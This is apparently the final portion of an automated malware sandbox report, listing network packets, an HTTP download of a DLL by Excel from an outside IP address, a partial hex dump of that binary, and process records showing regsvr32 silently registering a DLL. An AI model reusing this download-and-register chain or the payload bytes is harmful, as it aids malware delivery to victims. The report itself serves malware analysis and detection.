                                                                                                                                                Jun 9, 2021 23:54:47.843414068 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843434095 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843434095 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843453884 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843457937 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843462944 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843477011 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843488932 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843494892 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843508959 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843533039 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843584061 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843894005 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843913078 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843929052 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843944073 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843961000 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843960047 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843976974 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843977928 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.843991995 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.843998909 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844017982 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844022036 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844042063 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844075918 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844342947 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844366074 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844383001 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844398975 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844402075 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844415903 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844415903 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844434977 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844449997 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844450951 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844469070 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844481945 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844485998 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844494104 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844506979 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844520092 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844526052 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844542980 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844543934 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844561100 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.844566107 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844587088 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.844615936 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.845199108 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.845217943 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.845237970 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.845254898 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.845257044 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.845273018 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.845279932 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.845297098 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.845316887 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.845347881 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:47.845504045 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.845558882 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:54:52.771023035 CEST8049719185.180.199.121192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:52.771135092 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:56:34.373943090 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:56:34.685674906 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:56:35.295108080 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:56:36.498507023 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:56:38.904879093 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:56:43.717941999 CEST4971980192.168.2.3185.180.199.121
                                                                                                                                                Jun 9, 2021 23:56:53.327892065 CEST4971980192.168.2.3185.180.199.121

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Jun 9, 2021 23:54:32.001111984 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:32.795409918 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:32.845593929 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:33.770195961 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:33.823190928 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:34.719290972 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:34.779447079 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:35.495938063 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:35.551264048 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:36.295209885 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:36.348037958 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:37.534324884 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:37.588934898 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:40.942732096 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:41.001425028 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:43.446211100 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:43.496730089 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:44.360688925 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:44.419414043 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:44.449712992 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:44.469897985 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:44.938147068 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:45.012216091 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:45.964745045 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:46.038683891 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.011648893 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:47.071829081 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:47.287636042 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:47.337920904 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:48.383496046 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:48.441927910 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:49.073967934 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:49.135250092 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:49.257913113 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:49.316227913 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:50.444689035 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:50.494801998 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:51.427377939 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:51.480588913 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:52.300318956 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:52.351444006 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:53.121059895 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:53.179208994 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:56.914474010 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:56.967276096 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:54:57.824922085 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:54:57.884726048 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:55:09.354513884 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:55:09.425384045 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:55:28.075978994 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:55:28.127548933 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:55:40.689970016 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:55:40.764213085 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:55:41.756185055 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:55:41.826765060 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:55:59.762665033 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:55:59.823335886 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:00.696613073 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:00.755624056 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:00.841264963 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:00.899986029 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:01.894507885 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:01.958168030 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:02.884604931 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:02.946110010 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:03.897176981 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:03.949732065 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:04.905435085 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:04.967329979 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:05.886230946 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:05.939667940 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:07.252216101 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:07.312077045 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:08.590249062 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:08.649384022 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:09.563621044 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:09.623941898 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:18.801214933 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:18.859745026 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:20.518312931 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:20.580265045 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:24.769253016 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:24.831938982 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:54.407386065 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:54.468580961 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                Jun 9, 2021 23:56:56.068453074 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                Jun 9, 2021 23:56:56.128381014 CEST53568038.8.8.8192.168.2.3

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Jun 9, 2021 23:55:40.764213085 CEST8.8.8.8192.168.2.30x3fe5No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 185.180.199.121

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.349719185.180.199.12180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Jun 9, 2021 23:54:47.363862038 CEST1098OUTGET /sat1_0609_2.dll HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 185.180.199.121
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Jun 9, 2021 23:54:47.443046093 CEST1100INHTTP/1.1 200 OK
                                                                                                                                                Date: Wed, 09 Jun 2021 21:54:41 GMT
                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28
                                                                                                                                                Last-Modified: Wed, 09 Jun 2021 20:56:10 GMT
                                                                                                                                                ETag: "803e0-5c45b81110e80"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 525280
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAAAAAAAAASAAArAA"AArAArAARichAPELt`!@P d`UPi#0P.text7@ `.rdataPP@@.datac0@.rsrciPp@@.reloc_`@B
                                                                                                                                                Jun 9, 2021 23:54:47.443085909 CEST1101INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii:
                                                                                                                                                Jun 9, 2021 23:54:47.443161964 CEST1103INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii:
                                                                                                                                                Jun 9, 2021 23:54:47.443205118 CEST1104INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii:
                                                                                                                                                Jun 9, 2021 23:54:47.443494081 CEST1105INData Raw: 24 38 52 50 8b ce e8 dc f1 01 00 c7 44 24 30 00 00 00 00 c7 44 24 2c ec 59 02 10 8d 4c 24 48 c6 84 24 c4 00 00 00 02 51 ff 15 b4 50 02 10 50 8d 4c 24 30 e8 94 e0 01 00 8d 54 24 2c 8b ce 52 e8 ce dc 01 00 8b 4f 40 8b 06 51 8b ce ff 50 30 8b 44 24
                                                                                                                                                Data Ascii: $8RPD$0D$,YL$H$QPPL$0T$,RO@QP0D$\$j%HSQPRhD$DL$@T$<PD$<QL$8RPQPT$,RO<QP0D$\$j%HSQPRhjVD$,YL$,$N2D$tGDG<PR0D$
                                                                                                                                                Jun 9, 2021 23:54:47.443536043 CEST1107INData Raw: 02 10 c3 90 90 90 90 90 90 90 90 90 90 6a ff 68 29 3c 02 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 51 8b 44 24 14 56 8b f1 50 6a 66 89 74 24 0c e8 af b8 01 00 8d 4e 5c c7 44 24 10 00 00 00 00 e8 93 6e 01 00 8d 4e 64 c6 44 24 10 01 e8 86 6e 01
                                                                                                                                                Data Ascii: jh)<dPd%QD$VPjft$N\D$nNdD$nNlD$MD$XX@hP4TL$^dVxD$tV=u^D$lQhP W
                                                                                                                                                Jun 9, 2021 23:54:47.443573952 CEST1108INData Raw: 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85
                                                                                                                                                Data Ascii: jjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjt
                                                                                                                                                Jun 9, 2021 23:54:47.443612099 CEST1110INData Raw: 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a
                                                                                                                                                Data Ascii: tjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjj
                                                                                                                                                Jun 9, 2021 23:54:47.443743944 CEST1111INData Raw: 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85
                                                                                                                                                Data Ascii: jjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjt
                                                                                                                                                Jun 9, 2021 23:54:47.443783045 CEST1113INData Raw: 00 c7 44 24 18 70 24 00 00 c7 44 24 1c 12 04 00 00 ff 15 10 01 03 10 85 c0 7c 1a 8b 54 24 00 68 14 01 03 10 68 18 01 03 10 52 68 00 00 00 10 ff 15 0c 01 03 10 b8 01 00 00 00 83 c4 10 c3 90 90 90 90 90 90 90 68 00 e1 02 10 ff 15 78 52 02 10 85 c0
                                                                                                                                                Data Ascii: D$p$D$|T$hhRhhxRuSV3gztyt*ShPh0PS|RP"hPh0Qjt5W
                                                                                                                                                Jun 9, 2021 23:54:47.522511005 CEST1114INData Raw: ec 20 01 00 00 85 c0 53 55 56 57 0f 84 1e 03 00 00 3d ff ff 00 00 c7 44 24 10 ff ff 00 00 73 06 89 44 24 10 eb 2a 80 38 23 75 25 40 50 e8 22 86 00 00 83 c4 04 3d ff ff 00 00 73 14 85 c0 74 10 89 44 24 10 25 ff ff 00 00 89 84 24 38 01 00 00 8b 9c
                                                                                                                                                Data Ascii: SUVW=D$sD$*8#u%@P"=stD$%$8$4f;MZk<l$}PE$<D$PjQSD$$^T$L$xBm(wJ;wz$++L$$<B rz


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:23:54:43
                                                                                                                                                Start date:09/06/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:23:54:48
                                                                                                                                                Start date:09/06/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:regsvr32 -s ..\kdldyeff.dll
                                                                                                                                                Imagebase:0x1310000
                                                                                                                                                File size:20992 bytes
                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:23:55:38
                                                                                                                                                Start date:09/06/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe
                                                                                                                                                Imagebase:
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >

